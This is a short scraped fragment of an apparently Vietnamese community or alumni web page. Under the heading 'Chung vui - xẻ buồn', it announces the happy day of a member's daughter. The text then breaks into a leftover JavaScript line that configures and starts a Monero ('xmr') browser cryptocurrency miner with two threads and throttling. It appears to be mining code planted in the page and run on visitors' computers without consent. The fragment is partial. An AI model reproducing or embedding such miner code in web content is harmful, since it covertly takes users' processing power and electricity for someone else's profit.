CHUNG VUI - XẺ BUỒN
NGÀY VUI CỦA CON GÁI CHỊ NGUYỄN THỊ THU LIÊN - K2
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();